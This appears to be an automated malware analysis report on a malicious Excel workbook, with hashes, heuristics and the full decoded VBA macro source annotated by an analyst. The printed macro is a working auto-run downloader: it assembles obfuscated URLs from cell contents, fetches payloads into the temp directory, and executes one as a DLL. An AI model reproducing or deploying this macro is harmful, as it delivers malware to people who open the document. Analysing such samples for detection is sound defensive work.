Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 85efbeb17d8e366e…

MALICIOUS

Office (OLE)

123.5 KB Created: 2020-02-10 10:41:43 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: a8af9448db3633caaa99b48015414002 SHA-1: 2a9a76c3d9b61ca8c302244bb1853269b1f6c52c SHA-256: 85efbeb17d8e366e0f67d21fecc3fc754ecb997ee2033682f47cb0da38439c02
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is an Excel file containing a Workbook_Open VBA macro. The macro assembles its download URLs from strings stored in worksheet cells, uses the URLDownloadToFileA API to fetch a second-stage payload from a remote source into the user's temporary directory (resolved with GetTempPathA), and then uses LoadLibraryA to load that file as a DLL, which executes it. The document body content appears to be unrelated filler text, suggesting the macro is the primary malicious component.

Heuristics 5

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If Win64 And VBA7 Then
    Private Declare PtrSafe Function URLDownloadToFileA Lib "Urlmon" (ByVal one As LongPtr, ByVal two As String, ByVal three As String, ByVal four As LongPtr, ByVal five As LongPtr) As LongPtr
    Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal two As String) As LongPtr
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Public Sub Workbook_Open()
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3748 bytes
SHA-256: 71215c6fa7fc327cb4dd95be71d2bafc2bcbaeac91a6c8cc46d9f1a92bb1f2ab
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' --- Win32 API imports (analyst annotation) ---
' The same four functions are declared three times under conditional
' compilation; only the PtrSafe keyword and the pointer width (LongPtr vs
' Long) differ between branches. The parameter names (one..five) carry no
' meaning. Roles, per the Win32 signatures:
'   URLDownloadToFileA(pCaller, szURL, szFileName, dwReserved, lpfnCB)
'       downloads a URL straight into a local file (urlmon.dll)
'   LoadLibraryA(lpLibFileName)
'       maps a DLL into the current process; its entry point runs on load,
'       which is how the downloaded file gets executed below
'   FreeLibrary(hModule)
'       releases the mapped DLL again
'   GetTempPathA(nBufferLength, lpBuffer)
'       writes the %TEMP% directory into lpBuffer and returns its length
' NOTE(review): the middle branch (#If Win64 without VBA7) uses PtrSafe and
' LongPtr, which only exist in VBA7, so it looks unreachable - presumably
' copied boilerplate; confirm.
#If Win64 And VBA7 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib "Urlmon" (ByVal one As LongPtr, ByVal two As String, ByVal three As String, ByVal four As LongPtr, ByVal five As LongPtr) As LongPtr
Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal two As String) As LongPtr
Private Declare PtrSafe Function FreeLibrary Lib "kernel32" (ByVal two As LongPtr) As Integer
Private Declare PtrSafe Function GetTempPathA Lib "kernel32" (ByVal one As LongPtr, ByVal two As String) As Integer
#Else
#If Win64 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib "Urlmon" (ByVal one As LongPtr, ByVal two As String, ByVal three As String, ByVal four As LongPtr, ByVal five As LongPtr) As LongPtr
Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal two As String) As LongPtr
Private Declare PtrSafe Function FreeLibrary Lib "kernel32" (ByVal two As LongPtr) As Integer
Private Declare PtrSafe Function GetTempPathA Lib "kernel32" (ByVal one As LongPtr, ByVal two As String) As Integer
#Else
' 32-bit / pre-VBA7 hosts: plain Long handles, no PtrSafe.
Private Declare Function URLDownloadToFileA Lib "Urlmon" (ByVal one As Long, ByVal two As String, ByVal three As String, ByVal four As Long, ByVal five As Long) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal two As String) As Long
Private Declare Function FreeLibrary Lib "kernel32" (ByVal two As Long) As Integer
Private Declare Function GetTempPathA Lib "kernel32" (ByVal one As Long, ByVal two As String) As Integer
#End If

#End If

' Module-level state shared between Workbook_Open and cccc (both below).
' Roles are taken from how Workbook_Open assigns and uses them.
Dim u As String      ' contents of Sheet1!C4: the string the download URLs are sliced from
Dim b As String      ' contents of Sheet1!C10; later overwritten with the first output file path
Dim s As String      ' buffer handed to GetTempPathA (initialised from b)
Dim c As String      ' first download URL
Dim pp As String     ' second download URL (c plus one extra character)
Dim v As String      ' scratch: substring being appended; finally the second output file path
Dim d As String      ' copy of the temp-directory path
Dim inte As Integer  ' length returned by GetTempPathA

' Auto-run entry point: executes as soon as the workbook is opened with
' macros enabled (the OLE_VBA_WBOPEN heuristic). Sequence: remove a shape,
' read two cell strings, splice two URLs out of the first, then - depending
' on host bitness - download two files into %TEMP% and load one of them as
' a DLL. All state lives in the module-level variables declared above.
Public Sub Workbook_Open()

' Deletes a shape from the active sheet; presumably a decoy image shown
' until macros are enabled - the shape itself is not in this extract.
ActiveSheet.Shapes("Picture 1").Delete

' Neither the URLs nor the file name appear literally in the macro: they
' are assembled from cell contents, so IOC extraction must read Sheet1!C4
' and Sheet1!C10 from the workbook itself.
u = Sheets("Sheet1").Range("C4")
b = Sheets("Sheet1").Range("C10")
s = b
' c = fixed-offset slices of u concatenated in this order. Because the
' offsets are hard-coded, C4 has to hold the URL characters at exactly
' these positions; the rest of the cell is padding.
v = Mid(u, 23, 2)
c = v
v = Mid(u, 37, 2)
c = c + v
v = Mid(u, 67, 1)
c = c + v
v = Mid(u, 53, 2)
c = c + v
v = Mid(u, 75, 12)
c = c + v
v = Mid(u, 111, 1)
c = c + v
v = Mid(u, 117, 3)
c = c + v
v = Mid(u, 137, 1)
c = c + v
' pp = c plus one more character from u: the second URL shares c's prefix
' and differs only in its tail.
pp = c
v = Mid(u, 8, 1)
pp = pp + v

' Bitness dispatch. 64-bit hosts delegate to cccc (defined below), which
' repeats the #Else branch here except that it appends Mid(u, 13, 1) to c
' instead of Mid(u, 2, 1) - presumably selecting an architecture-specific
' payload; confirm against the cell contents.
#If Win64 And VBA7 Then
Call cccc
#Else
#If Win64 Then
Call cccc
#Else
' 32-bit path.
v = Mid(u, 2, 1)
c = c + v                           ' final character of URL c
' GetTempPathA fills s (the C10 string, used as the buffer) with the temp
' directory and returns the number of characters written.
inte = GetTempPathA(512, s)
v = Mid(b, 53, 8)                   ' 8-character fragment of C10: the output file name
b = Mid(s, 1, inte)                 ' b = temp directory path (GetTempPath includes the trailing backslash)
d = b
b = b + v                           ' b = <temp dir><8-char name>: destination of the first download
v = d + Mid(d, 5, 1)                ' v = <temp dir> + 5th character of that path: destination of the second download
URLDownloadToFileA 0, c, b, 0, 0    ' (pCaller, szURL, szFileName, reserved, callback): URL c -> file b
URLDownloadToFileA 0, pp, v, 0, 0   ' URL pp -> file v
' Execution stage: the first downloaded file is loaded as a DLL, so its
' entry point runs inside the Excel process, then the handle is released.
' Detection surface: Excel writing into %TEMP% followed by an image load
' from %TEMP%.
Dim ulng As Long
ulng = LoadLibraryA(b)
FreeLibrary ulng
#End If
#End If
End Sub


' 64-bit variant of the download-and-load sequence, called from
' Workbook_Open after c and pp have been built. Works entirely on the
' module-level variables (u, b, s, c, pp, v, d, inte). It mirrors the
' 32-bit branch of Workbook_Open except for the character appended to c
' (offset 13 instead of 2) and the LongPtr handle type.
Public Sub cccc()
v = Mid(u, 13, 1)
c = c + v                           ' final character of URL c (64-bit variant)
inte = GetTempPathA(512, s)         ' s (= C10 contents) receives the temp directory; inte = its length
v = Mid(b, 53, 8)                   ' 8-character file-name fragment from C10
b = Mid(s, 1, inte)                 ' temp directory path
d = b
b = b + v                           ' first output path: temp dir + 8-char name
v = d + Mid(d, 5, 1)                ' second output path: temp dir + 5th character of that path
URLDownloadToFileA 0, c, b, 0, 0    ' URL c -> file b
URLDownloadToFileA 0, pp, v, 0, 0   ' URL pp -> file v
' Loads the first download as a DLL (its entry point runs inside Excel),
' then releases the handle.
Dim ulng As LongPtr
ulng = LoadLibraryA(b)
FreeLibrary ulng
End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Empty selection-change event stub in Sheet2 - presumably auto-generated
' by the VBA editor. It has no body and plays no part in the infection
' chain.
Private Sub Worksheet_SelectionChange(ByVal Target As Range)

End Sub